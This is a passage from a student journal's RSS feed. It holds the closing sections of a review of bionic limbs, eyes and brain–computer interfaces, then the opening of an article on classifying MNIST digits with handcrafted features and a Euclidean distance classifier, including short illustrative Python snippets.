<li>Power Supply and Energy Efficiency: Most prosthetic systems rely on rechargeable lithium-ion batteries, which add weight and require frequent charging. High-resolution bionic eyes and neural stimulators demand significant power for continuous operation, yet miniaturized power systems remain limited. Energy harvesting from body motion, thermoelectric gradients, or biofuel cells has been explored but is not yet clinically viable.</li>
</ol>



<ol start="3" class="wp-block-list">
<li>Durability and Mechanical Robustness: Devices implanted in the body must withstand years of mechanical stress. MEMS sensors, polymer electrodes, and microelectronics may degrade under physiological conditions. Similarly, osseointegrated implants must tolerate repetitive load-bearing without loosening. Failures not only compromise device function but may necessitate surgical revision, which carries additional risk [15].</li>
</ol>



<ol start="4" class="wp-block-list">
<li>Limited Bandwidth of Neural Interfaces: Even state-of-the-art cortical arrays record from a few hundred neurons, far below the millions involved in natural motor control. Intraneural electrodes provide some selectivity but risk damaging nerve fascicles. As a result, current devices cannot yet replicate the information throughput of the intact nervous system, restricting fine dexterity and natural sensory richness [1], [3].</li>
</ol>



<h4 class="wp-block-heading">B. Biological and Clinical Challenges</h4>



<ol class="wp-block-list">
<li>Immune Response and Biocompatibility: Foreign-body response to implanted electrodes leads to fibrotic encapsulation, increasing impedance and reducing signal quality over time. Flexible polymers (polyimide, parylene-C) mitigate this mismatch, but chronic inflammation remains a barrier to decades-long stability [9]. Similarly, neural tissue is highly sensitive; intraneural arrays risk long-term axonal degeneration.</li>
</ol>



<ol start="2" class="wp-block-list">
<li>Infection Risk in Osseointegration: Osseointegrated prostheses solve socket issues but leave a skin breach vulnerable to infection, despite titanium’s biocompatibility and antimicrobial coatings [15]. For many surgeons, this is the key clinical barrier to adoption.</li>
</ol>



<ol start="3" class="wp-block-list">
<li>User Variability: Each patient presents unique residual anatomy, nerve distribution, and physiology. This heterogeneity makes one-size-fits-all solutions impractical. A prosthesis calibrated for one individual may fail in another with different EMG signal distribution. Personalized adaptation through AI offers promise but requires extensive data and user training [12].</li>
</ol>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="705" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-1024x705.jpeg" alt="" class="wp-image-4564" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-1024x705.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-300x207.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-768x529.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-1000x688.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-230x158.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-350x241.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8-480x330.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-8.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 10: Challenge severity heatmap (0–10) across technical, biological, and ethical domains. Entries are informed by clinical/engineering overviews [9], osseointegration cohorts [15], device and interface reports [1], [3], and neurotechnology ethics guidance [25].</p>



<ol start="4" class="wp-block-list">
<li>Rehabilitation and Training Burden: Complex bionic devices demand intensive rehabilitation. For example, users of targeted reinnervation prostheses must undergo weeks of training to learn new muscle–nerve mappings [3]. Without structured rehabilitation, even advanced devices risk abandonment. Successful adoption also depends on continuous feedback from clinicians, adaptive training software, and strong patient motivation. Limited access to rehabilitation resources further compounds these challenges, highlighting the need for more intuitive control strategies and scalable support systems.</li>
</ol>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="342" height="572" src="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.55.10-PM.png" alt="" class="wp-image-4565" style="width:257px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.55.10-PM.png 342w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.55.10-PM-179x300.png 179w, https://exploratiojournal.com/wp-content/uploads/2025/10/Screenshot-2025-10-21-at-9.55.10-PM-230x385.png 230w" sizes="(max-width: 342px) 100vw, 342px" /></figure>



<p>Fig. 11: Failure pathway flowchart: signal noise/drift → calibration loss → poor usability → device abandonment.</p>



<h4 class="wp-block-heading">C. Ethical and Regulatory Challenges</h4>



<ol class="wp-block-list">
<li>Accessibility and Equity: Advanced prostheses such as neuromusculoskeletal arms or retinal implants cost tens of thousands of dollars, often exceeding insurance coverage. As a result, access is restricted to high-resource healthcare systems, leaving the vast majority of potential users worldwide without benefit.</li>



<li>Privacy and Data Security: Brain–computer interfaces generate continuous neural data streams, raising concerns about privacy, surveillance, and misuse. Questions of ownership and protection of neural data are critical as BCIs move toward commercial use [25].</li>



<li>Regulatory Uncertainty: Regulatory frameworks (FDA, EMA) struggle to classify hybrid devices that combine hardware, software, and surgical procedures. Is a neuromusculoskeletal prosthesis a medical device, an implant, or a drug–device combination? These uncertainties slow approval processes and complicate clinical translation.</li>



<li>Psychological and Social Factors: Bionic devices affect not only physiology but also identity. While many users embrace prostheses as part of their body schema, others experience alienation. High expectations, fueled by media portrayals of “superhuman cyborgs,” may lead to disappointment when real devices fall short. Social stigma and lack of support also contribute to device abandonment [17].</li>
</ol>



<p>TABLE VI: Challenges and Limitations of Bionic Devices Across Categories</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Device Category</td><td>Technical Challenge&nbsp;</td><td>BiologicalChallenge</td><td>Ethical/RegulatoryChallenge</td></tr><tr><td>Bionic Limbs</td><td>Signal drift; limitedbandwidth</td><td>Infection risk(osseointegration)</td><td>High cost; limitedaccessibility</td></tr><tr><td>Bionic Eyes&nbsp;</td><td>Low resolution; highpower use</td><td>Retinal scarring(implants)</td><td>Limited approvalpathways</td></tr><tr><td>CochlearImplants</td><td>Limited frequencyresolution</td><td>Variable outcomes inlate-deafened users</td><td>Access inlow-incomecountries</td></tr><tr><td>ArtificialPancreas</td><td>Sensor lag; pumpprecision</td><td>Skin reactions tosensors</td><td>Insurance coverage;affordability</td></tr><tr><td>Brain–ComputerInterfaces</td><td>Low neuronsampling; instability</td><td>Neural tissuedamage;encapsulation</td><td>Privacy of neuraldata; unclearregulation</td></tr></tbody></table></figure>



<h4 class="wp-block-heading">D. Toward Overcoming Limitations</h4>



<p>Efforts to address these limitations include:</p>



<ul class="wp-block-list">
<li>Flexible bioelectronics that minimize immune response [11].</li>
</ul>



<ul class="wp-block-list">
<li>Antimicrobial and regenerative coatings for osseointegration [15].</li>
</ul>



<ul class="wp-block-list">
<li>On-device AI that adapts to signal drift in real time [12].</li>
</ul>



<ul class="wp-block-list">
<li>Energy harvesting systems that exploit body heat or motion [20].</li>
</ul>



<ul class="wp-block-list">
<li>Ethical frameworks for neural data protection being drafted by international bioethics committees [25].</li>
</ul>



<p>While none of these solutions is definitive, the rapid pace of interdisciplinary research suggests that many current barriers may be partially overcome within the next decade.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="891" height="594" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-9.jpeg" alt="" class="wp-image-4566" style="width:500px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-9.jpeg 891w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-9-300x200.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-9-768x512.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-9-230x153.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-9-350x233.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-9-480x320.jpeg 480w" sizes="(max-width: 891px) 100vw, 891px" /></figure>



<p>Fig. 12: Conceptual framework for the Future of Bionics. The figure highlights five major domains expected to shape ongoing advances: Advanced Prostheses, AI &amp; Control, Sensing &amp; Feedback, Clinical Translation, and Integration.</p>



<h2 class="wp-block-heading">VII. Future Directions </h2>



<p>The future of bionic devices lies in the pursuit of seamless human–machine integration, where artificial systems are no longer merely tools but functional extensions of the body. This vision depends on advances across materials science, neuroscience, artificial intelligence, and clinical medicine. The following subsections outline key directions for research and development.</p>



<h4 class="wp-block-heading">A. Closed-Loop Systems</h4>



<p>One of the most transformative frontiers in bionics is the realization of closed-loop systems that integrate sensing, computation, and actuation in a continuous feedback cycle. Current devices often operate in open-loop: users send motor commands, but feedback is limited or absent. This mismatch increases cognitive burden and reduces naturalism.</p>



<ol class="wp-block-list">
<li>Closed-Loop Limb Prostheses: Future prostheses will combine multimodal sensory feedback (touch, proprioception, temperature) with real-time motor decoding. For example, Ortiz-Catalan’s osseointegrated system demonstrates that stable long-term recording and stimulation are possible [1]. The next step is to expand sensory channels, potentially incorporating thermal sensors like those proposed in thermally sentient limb prototypes [8].</li>
</ol>



<ol start="2" class="wp-block-list">
<li>Closed-Loop Vision: Neuromorphic retinas already integrate preprocessing [10], [11]. Coupled with cortical implants capable of delivering spatially distributed stimulation, future bionic eyes may offer continuous adaptive vision, adjusting to light conditions, motion, and attention demands.</li>
</ol>



<ol start="3" class="wp-block-list">
<li>Closed-Loop Organ Devices: The artificial pancreas exemplifies the power of closed-loop design, and similar architectures may be applied to renal replacement (bionic kidney) or cardiac regulation (bioelectronic pacemakers with adaptive control). These devices would monitor physiological parameters continuously and autonomously adjust output, minimizing user intervention.</li>
</ol>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="264" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-1024x264.jpeg" alt="" class="wp-image-4567" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-1024x264.jpeg 1024w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-300x77.jpeg 300w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-768x198.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-1000x258.jpeg 1000w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-230x59.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-350x90.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10-480x124.jpeg 480w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-10.jpeg 1165w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>Fig. 13: AI-driven closed loop in bionic devices: user intent → AI decoding/control → device actuation; multimodal sensory feedback closes the loop and adapts the user.</p>



<h4 class="wp-block-heading">B. Artificial Intelligence Integration</h4>



<p>AI is expected to play a central role in the next generation of bionics, from signal decoding to personalized adaptation.</p>



<ol class="wp-block-list">
<li>Adaptive Decoding: Deep neural networks can outperform traditional pattern recognition in EMG/EEG classification, particularly under noisy conditions. Reinforcement learning approaches demonstrate that systems can learn alongside users, adapting to signal drift and improving control fidelity without explicit recalibration [12].</li>
</ol>



<ol start="2" class="wp-block-list">
<li>Personalization: AI enables prostheses to learn user-specific patterns, such as grip preferences, walking dynamics, or habitual tasks. Over time, the device can anticipate actions, moving toward predictive control rather than reactive operation.</li>
</ol>



<ol start="3" class="wp-block-list">
<li>AI in Sensory Processing: In vision and hearing prostheses, AI can denoise input signals, highlight salient features, or adapt stimulation patterns for optimal perception. For example, a bionic eye might enhance contrast in low-light conditions or suppress irrelevant motion, mimicking biological attentional mechanisms.</li>
</ol>



<h4 class="wp-block-heading">C. Fully Implantable Energy Systems</h4>



<p>Energy supply remains a critical barrier. A major future direction is the development of fully implantable, autonomous power sources.</p>



<ol class="wp-block-list">
<li>Biofuel Cells: Glucose biofuel cells convert glucose and oxygen from bodily fluids into electricity. Early prototypes have powered pacemakers in animal models, suggesting feasibility for low-power implants.</li>



<li>Energy Harvesting: Thermoelectric generators can exploit the temperature gradient between body heat and ambient air, while piezoelectric harvesters generate power from motion. If scaled effectively, such technologies could eliminate the need for external charging (a back-of-envelope power estimate follows below).</li>
</ol>



<ol start="3" class="wp-block-list">
<li>Wireless Power Transfer: Mid-field and ultrasound-based wireless charging systems are being explored as alternatives to inductive coupling, enabling deeper implants to be recharged without bulky external coils.</li>
</ol>
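<p>For scale, a back-of-envelope estimate of matched-load thermoelectric power, P = (S·ΔT)² / (4R), is sketched below; the Seebeck coefficient, temperature gradient, and internal resistance are assumed values chosen only to illustrate the milliwatt regime such harvesters occupy.</p>

<pre class="wp-block-code"><code># Back-of-envelope thermoelectric harvesting estimate (all values assumed).
S = 0.05      # module-level Seebeck coefficient, V/K
dT = 5.0      # skin-to-ambient temperature gradient, K
R = 10.0      # module internal resistance, ohm

P = (S * dT) ** 2 / (4 * R)            # matched-load electrical power, W
print(f"matched-load power: {P * 1e3:.2f} mW")   # ~1.56 mW at these values
</code></pre>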



<h4 class="wp-block-heading">D. Advanced Materials and Interfaces</h4>



<ul class="wp-block-list">
<li>Living Electrodes: Incorporating stem-cell–derived neurons into electrode arrays could reduce immune rejection and improve signal fidelity.</li>



<li>Self-Healing Polymers: Materials capable of repairing microcracks would extend device longevity under mechanical stress.</li>
</ul>



<p>TABLE VII: Emerging Research Trends and Future Directions in Bionics</p>



<figure class="wp-block-table"><table class="has-fixed-layout"><tbody><tr><td>Domain</td><td>Emerging Innovation</td><td>Anticipated Impact(5-10 years)</td><td colspan="2">Example Studies</td></tr><tr><td>Limb Prostheses</td><td>Bidirectional,multimodal feedback</td><td>Naturalistic control andembodiment</td><td colspan="2">Ortiz-Catalan(2023) [1], Marasco(2021) [3]</td></tr><tr><td>Vision&nbsp;</td><td>Neuromorphic retinas</td><td>Color, wide-FoVartificial vision</td><td colspan="2">Long (2023) [10],Zhang (2023) [11]</td></tr><tr><td>Hearing</td><td>Optogenetic cochlearimplants</td><td>Finer frequencyresolution; musicperception</td><td colspan="2">Wilson (2017) [24]</td></tr><tr><td>Organ Bionics&nbsp;</td><td>Dual-hormone artificialpancreas</td><td>Near-physiologicalglycemic control</td><td colspan="2">Hovorka (2011) [23]</td></tr><tr><td>Energy&nbsp;</td><td>Glucose biofuel cells;wireless charging</td><td>Fully implantableautonomous power</td><td colspan="2">Nat. Commun.(2024) [18]</td></tr><tr><td>NeuralInterfaces</td><td>Wireless minimallyinvasive arrays</td><td>Home-use BCIs forparalysis</td><td colspan="2">Hochberg(2012) [14]</td></tr><tr><td></td><td></td><td></td><td></td><td></td></tr></tbody></table></figure>



<ul class="wp-block-list">
<li>Nanostructured Coatings: Surfaces engineered at the nanoscale can reduce bacterial adhesion (limiting infection risk) while promoting neural growth.</li>
</ul>



<h4 class="wp-block-heading">E. Ethical, Social, and Regulatory Horizons</h4>



<p>As devices become more integrated and powerful, ethical considerations will intensify.</p>



<ul class="wp-block-list">
<li>Cognitive Autonomy: Closed-loop BCIs blur the boundary between user intent and machine response, raising questions about responsibility and agency.</li>



<li>Human Enhancement vs. Therapy: While most bionics are designed for rehabilitation, the same technologies could be repurposed for augmentation, e.g., enhanced vision beyond the human spectrum.</li>



<li>Global Accessibility: Future efforts must prioritize equitable distribution, ensuring that breakthroughs benefit not only high-income nations but also the global disabled population.</li>
</ul>



<h4 class="wp-block-heading">F. A 5–10 Year Outlook</h4>



<p>Within the next decade, it is realistic to expect:</p>



<ul class="wp-block-list">
<li>Commercially available bidirectional prostheses with tactile and kinesthetic feedback.</li>

<li>Next-generation artificial pancreas systems incorporating dual-hormone control (insulin + glucagon) for near-normal glycemic regulation.</li>

<li>Retinal prostheses with color vision based on neuromorphic phototransistor arrays.</li>

<li>BCIs with wireless, minimally invasive arrays enabling everyday use in home environments.</li>

<li>Early adoption of autonomous power systems, reducing dependence on external charging.</li>
</ul>



<p>In parallel, advances in AI, regenerative medicine, and material science will continue to converge, driving bionics toward devices that are smaller, smarter, and more biologically integrated.</p>



<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="891" height="956" src="https://exploratiojournal.com/wp-content/uploads/2025/10/image-11.jpeg" alt="" class="wp-image-4568" style="width:558px;height:auto" srcset="https://exploratiojournal.com/wp-content/uploads/2025/10/image-11.jpeg 891w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-11-280x300.jpeg 280w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-11-768x824.jpeg 768w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-11-230x247.jpeg 230w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-11-350x376.jpeg 350w, https://exploratiojournal.com/wp-content/uploads/2025/10/image-11-480x515.jpeg 480w" sizes="(max-width: 891px) 100vw, 891px" /></figure>



<p>Fig. 14: Convergence of disciplines: neuroscience, engineering, AI, and ethics. The overlap represents future bionics as seamless human–machine symbiosis.</p>



<h4 class="wp-block-heading">G. Toward Convergence of Disciplines</h4>



<p>The future of bionics will not be driven by any single technology but by the convergence of multiple fields. Neuroscientists, engineers, material scientists, ethicists, and clinicians must collaborate closely to translate prototypes into scalable, safe, and accessible devices. If this trajectory is sustained, the coming decades may witness the realization of functional, lifelong, fully integrated artificial organs and limbs, transforming rehabilitation and human–machine symbiosis.</p>



<h2 class="wp-block-heading">VIII. Conclusion</h2>



<p>Bionic devices have evolved from crude mechanical substitutes to sophisticated systems capable of bidirectional integration with the human nervous system. The landscape now includes neuromusculoskeletal limb prostheses, neuromorphic bionic eyes, cochlear implants, artificial pancreas systems, and experimental brain–computer interfaces. Across these categories, the central trend is clear: modern bionics aim not merely to restore function but to recreate the natural sensory–motor loop, thereby enhancing embodiment, autonomy, and quality of life.</p>



<p>Key technological enablers include biocompatible materials (e.g., titanium for osseointegration, organic semiconductors for neuromorphic sensors), advanced sensors and actuators (MEMS tactile arrays, series elastic actuators), and high-bandwidth neural interfaces (intraneural electrodes, hybrid nerve constructs).</p>



<p>Artificial intelligence and machine learning are now integral, allowing devices to adapt dynamically to user variability and environmental change.</p>



<p>Clinical studies demonstrate tangible benefits: improved dexterity, reduced phantom pain, restored sensory perception, and automated metabolic regulation. Yet significant challenges remain. Technical barriers such as signal instability and power supply, biological risks including immune response and infection, and ethical concerns over equity and neural data privacy all impede widespread adoption.</p>



<p>Looking forward, the field is poised for breakthroughs in closed-loop systems, AI-driven personalization, fully implantable energy solutions, and multimodal sensory feedback. Within the next decade, it is realistic to envision prostheses that feel like natural limbs, artificial organs that self-regulate without intervention, and BCIs that allow paralyzed individuals to regain independence in daily life.</p>



<p>Ultimately, the future of bionics lies in the convergence of disciplines—neuroscience, engineering, medicine, and ethics—to create devices that are not only technologically advanced but also safe, equitable, and meaningful for users. The vision of lifelong, seamlessly integrated artificial organs and limbs is no longer science fiction, but an achievable milestone within a generation.</p>



<h2 class="wp-block-heading">References</h2>



<ol class="wp-block-list">
<li>M. Ortiz-Catalan et al., “A highly integrated bionic hand with neural control and feedback for use in daily life,” Sci. Robot., vol. 8, no. 77, eadf7360, 2023.</li>



<li>S. Dosen, “Toward self-contained bidirectional bionic limbs,” Sci. Robot., vol. 8, no. 77, eadk6086, 2023.</li>



<li>P. D. Marasco et al., “Neurorobotic fusion of prosthetic touch, kinesthesia, and movement,” Sci. Robot., vol. 6, no. 59, eabf3368, 2021.</li>



<li>C. Pasluosta et al., “Bidirectional bionic limbs,” J. Neural Eng., vol. 19, no. 1, 013001, 2022.</li>



<li>U.S. Food and Drug Administration, “Argus II Retinal Prosthesis System—Summary of Safety and Effectiveness Data,” FDA, 2011.</li>



<li>T. R. Clites et al., “Design and clinical implementation of an open-source bionic leg,” Nat. Biomed. Eng., vol. 4, pp. 941–952, 2020.</li>



<li>Y. Cho et al., “Hybrid bionic nerve interface for application in bionic limbs,” Adv. Sci., vol. 10, no. 5, 2206859, 2023.</li>



<li>M. Ortiz-Catalan, “Thermally sentient bionic limbs,” Nat. Biomed. Eng., 2024.</li>



<li>Editorial, “Advances in clinical and prosthetic care,” Front. Rehabil. Sci., vol. 3, 2022.</li>



<li>Z. Long et al., “A neuromorphic bionic eye with filter-free color vision using hemispherical perovskite nanowire array retina,” Nat. Commun., vol. 14, 37581, 2023.</li>



<li>H. Zhang et al., “A neuromorphic bionic eye with broadband vision and biocompatibility using TIPS-pentacene phototransistor array retina,” Appl. Mater. Today, vol. 32, 2023.</li>



<li>H. R. Schone et al., “Biomimetic versus arbitrary motor control strategies for bionic hand skill learning,” Nat. Hum. Behav., vol. 8, pp. 1108–1123, 2024.</li>



<li>S. N. Flesher et al., “Restored tactile sensation improves neuroprosthetic arm control,” Sci. Transl. Med., vol. 13, no. 612, 2021.</li>



<li>L. R. Hochberg et al., “Reach and grasp by people with tetraplegia using a neurally controlled robotic arm,” Nature, vol. 485, pp. 372–375, 2012.</li>



<li>R. Brånemark et al., “Osseointegrated percutaneous prostheses for patients with limb loss,” Bone Joint J., vol. 101-B, pp. 55–63, 2019.</li>



<li>C. Pasluosta, P. Kiele, S. Micera et al., “The current state of bionic limbs from the surgeon’s viewpoint,” J. Neural Eng., vol. 19, no. 1, 2022.</li>



<li>“The future of bionic limbs,” Prosthet. Orthot. Int., vol. 45, no. 5, 2021.</li>



<li>“Clinical implementation of advanced bionic prostheses,” Nat. Commun., vol. 15, 2024.</li>



<li>H. R. Schone et al., “Should bionic limb control mimic the human body? Impact of control strategy on bionic hand skill learning,” bioRxiv preprint, 2023.</li>



<li>“Advances in prosthetic rehabilitation sciences,” Front. Rehabil. Sci., vol. 3, 2022.</li>



<li>World Health Organization, Global Report on Rehabilitation, Geneva, 2022.</li>



<li>P. C. Loizou, “Cochlear implants: Historical perspective and current applications,” IEEE Eng. Med. Biol. Mag., vol. 25, no. 5, pp. 40–46, 2006.</li>



<li>R. Hovorka, “Closed-loop insulin delivery: From bench to clinical practice,” Nat. Rev. Endocrinol., vol. 7, pp. 385–395, 2011.</li>



<li>B. S. Wilson, “The future of cochlear implants,” J. Assoc. Res. Otolaryngol., vol. 18, pp. 695–704, 2017.</li>



<li>UNESCO International Bioethics Committee, “Ethical issues of neurotechnology,” Policy Report, 2021.</li>
</ol>



<ol start="23" class="wp-block-list"></ol>



<ol start="24" class="wp-block-list"></ol>



<hr style="margin: 70px 0;" class="wp-block-separator">



<div class="no_indent" style="text-align:center;">
<h4>About the author</h4>
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-34" style="border-radius:100%;" width="150" height="150">
<h5>Vyomesh Vikram Singh</h5><p>Vyomesh Vikram Singh is a recent high school graduate with interests in computer science, robotics, and edge AI. His projects have included automation systems, gesture-controlled vehicles, unmanned aerial platforms, and a low-cost Raspberry Pi projector designed for rural classrooms to help underprivileged children connect to the internet. He has also worked on model optimisation for IoT devices and authored a review on human–computer interfaces, bionic limbs, and neuromorphic vision.</p><p>His research interests include robotics, human–machine interaction, and efficient AI deployment on embedded systems. Beyond academics, Vyomesh served as a board member of Adlers, the Photography Club. Combining technology with art, he applied machine learning to make his filmography distinct and innovative, earning recognition at multiple competitions, including 3rd prize at Geofest International, an international geography documentary competition. Vyomesh has also pursued leadership and creative roles, including heading his school’s Robotics Club for 3 years, guiding peers in building prototypes, and organising seminar series with respected external speakers. He is also an intermediate guitar player and enjoys sharing his talent with those around him.

</p></figure></div>



<p></p>
<p>The post <a href="https://exploratiojournal.com/advanced-human-computer-interfaces-and-ai-a-comprehensive-review/">Advanced Human–Computer Interfaces and AI : A Comprehensive Review</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Interpretable Digit Classification using Handcrafted Features and Euclidean Distance</title>
		<link>https://exploratiojournal.com/interpretable-digit-classification-using-handcrafted-features-and-euclidean-distance/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=interpretable-digit-classification-using-handcrafted-features-and-euclidean-distance</link>
		
		<dc:creator><![CDATA[Austin Benedicto]]></dc:creator>
		<pubDate>Mon, 20 Oct 2025 21:39:47 +0000</pubDate>
				<category><![CDATA[Computer Science]]></category>
		<guid isPermaLink="false">https://exploratiojournal.com/?p=4409</guid>

					<description><![CDATA[<p>Austin Benedicto<br />
Nichols School</p>
<p>The post <a href="https://exploratiojournal.com/interpretable-digit-classification-using-handcrafted-features-and-euclidean-distance/">Interpretable Digit Classification using Handcrafted Features and Euclidean Distance</a> appeared first on <a href="https://exploratiojournal.com">Exploratio Journal</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<div class="wp-block-media-text is-stacked-on-mobile is-vertically-aligned-top" style="grid-template-columns:16% auto"><figure class="wp-block-media-text__media"><img loading="lazy" decoding="async" width="200" height="200" src="https://www.exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png" alt="" class="wp-image-488 size-full" srcset="https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1.png 200w, https://exploratiojournal.com/wp-content/uploads/2020/09/exploratio-article-author-1-150x150.png 150w" sizes="(max-width: 200px) 100vw, 200px" /></figure><div class="wp-block-media-text__content">
<p class="no_indent margin_none"><strong>Author:</strong>  Austin Benedicto<br><strong>Mentor</strong>: Dr. Rabih Younes<br><em>Nichols School<br></em></p>
</div></div>



<h2 class="wp-block-heading">Abstract</h2>



<p>The rapid growth of deep learning has overshadowed simpler, interpretable approaches to image classification. This study presents an alternative method for classifying handwritten digits using a custom feature extraction pipeline applied to the MNIST dataset. Rather than relying on convolutional neural networks, the classifier is built upon engineered features such as loop count, corner detection, symmetry score, bounding box dimensions, and writing direction. After normalization and feature weighting, a Euclidean distance classifier is used to compare new images to per-digit feature averages. The model achieves moderate accuracy and reveals detailed patterns of confusion between similar digits. This interpretable framework offers educational value, and may serve as a lightweight alternative in domains where transparency and explainability are prioritized.</p>



<h2 class="wp-block-heading">Introduction</h2>



<p>In recent years, machine learning and artificial intelligence have revolutionized image classification, with deep neural networks achieving state-of-the-art results across many datasets (Xie &amp; Tu, 2015). However, these models are often criticized for their lack of interpretability: they require massive computational resources and rely on opaque architectures that hinder trust in decision-making systems (Lundberg &amp; Lee, 2017; Fan et al., 2021). Particularly in educational settings or lightweight applications, simpler alternatives with explainable mechanisms are highly desirable. Interpretability is not just a technical challenge but a critical requirement for deploying AI responsibly, especially when end-users need to understand or contest the model&#8217;s decisions (Lipton, 2018).</p>



<p>This study explores a transparent, handcrafted pipeline for digit classification using the MNIST dataset. Instead of relying on pretrained convolutional networks, we develop a modular feature extraction system that emphasizes human-understandable visual traits. The extracted features are numerical descriptors such as bounding box dimensions, center of mass, symmetry, corner and intersection counts, and directional gradients derived from skeletonized images. These features are used in a Euclidean distance classifier that matches new digits to the closest mean feature vector per digit class. The objective is to demonstrate the utility and challenges of building a fully interpretable classification pipeline from scratch.</p>



<h2 class="wp-block-heading">Dataset and Preprocessing</h2>



<p>The experiment utilizes the well-established MNIST dataset, a collection of 70,000 grayscale images of handwritten digits ranging from 0 to 9. Each image is 28&#215;28 pixels in size and is paired with a corresponding digit label. For the purposes of this project, only the test set (10,000 samples) is used, with a configurable limit on how many samples per digit are extracted. Preprocessing begins by parsing the IDX-format image and label files into NumPy arrays, enabling efficient manipulation. The pixel values, originally ranging from 0 to 255, are binarized into black-and-white using a simple thresholding method. This step reduces noise and computational overhead for feature extraction algorithms, particularly those based on geometry and shape. Once binarized, each image is treated as a 2D grid where white pixels represent the strokes of the digit.</p>



<p>To prepare for classification, the dataset is stratified by digit class. A defined number of samples per digit (e.g., 100 images each for digits 0 through 9) is selected and then split into training and test sets. The training set comprises 80% of each digit&#8217;s samples, which are used to compute the mean feature vector for that class. The remaining 20% are reserved for evaluation. This consistent stratified sampling ensures that the model is exposed to a balanced and diverse set of handwriting styles while maintaining generalization in testing. This methodology facilitates accurate evaluation of the classifier&#8217;s performance using confusion matrices and accuracy metrics.</p>
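<p>To make the pipeline concrete, the following sketch shows one way to implement this preprocessing in Python, assuming the IDX files have already been parsed into NumPy arrays; the threshold of 128 and the 100-samples-per-digit limit are illustrative defaults, not necessarily the study&#8217;s exact settings.</p>

<pre class="wp-block-code"><code>import numpy as np

def binarize(images, threshold=128):
    """Map 0-255 grayscale pixels to a binary 0/1 grid."""
    return (images >= threshold).astype(np.uint8)

def stratified_split(labels, per_digit=100, train_frac=0.8, seed=0):
    """Pick per_digit samples of each class, then split them 80/20."""
    rng = np.random.default_rng(seed)
    train_idx, test_idx = [], []
    for digit in range(10):
        idx = np.flatnonzero(labels == digit)[:per_digit]
        rng.shuffle(idx)
        cut = int(train_frac * len(idx))
        train_idx.append(idx[:cut])
        test_idx.append(idx[cut:])
    return np.concatenate(train_idx), np.concatenate(test_idx)
</code></pre>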



<h2 class="wp-block-heading">Feature Extraction Pipeline</h2>



<p>Instead of relying on pixel-based convolutional layers or learned representations, this study employs a handcrafted feature extraction pipeline that emphasizes interpretability and simplicity. Each image undergoes a series of geometric and spatial analyses to extract meaningful numerical features. The first feature is the dark pixel count, which reflects the number of active (white) pixels in the binary image and serves as a proxy for stroke density. The center of mass is then calculated by averaging the coordinates of all white pixels, providing insight into digit placement and skew. Bounding box dimensions are computed by identifying the outermost white pixels, then determining the height and width of the smallest rectangle that encloses the digit: useful for distinguishing tall digits like 1 from wide digits like 8 or 0.</p>
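<p>A minimal sketch of these basic geometric features, assuming the binarized image is a NumPy 0/1 array (the function name is illustrative):</p>

<pre class="wp-block-code"><code>import numpy as np

def basic_features(binary_img):
    """Dark-pixel count, center of mass, and bounding box dimensions."""
    ys, xs = np.nonzero(binary_img)          # coordinates of stroke pixels
    pixel_count = len(xs)                    # proxy for stroke density
    center_of_mass = (xs.mean(), ys.mean())  # average stroke location
    bbox_w = xs.max() - xs.min() + 1         # smallest enclosing rectangle
    bbox_h = ys.max() - ys.min() + 1
    return pixel_count, center_of_mass, bbox_w, bbox_h
</code></pre>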



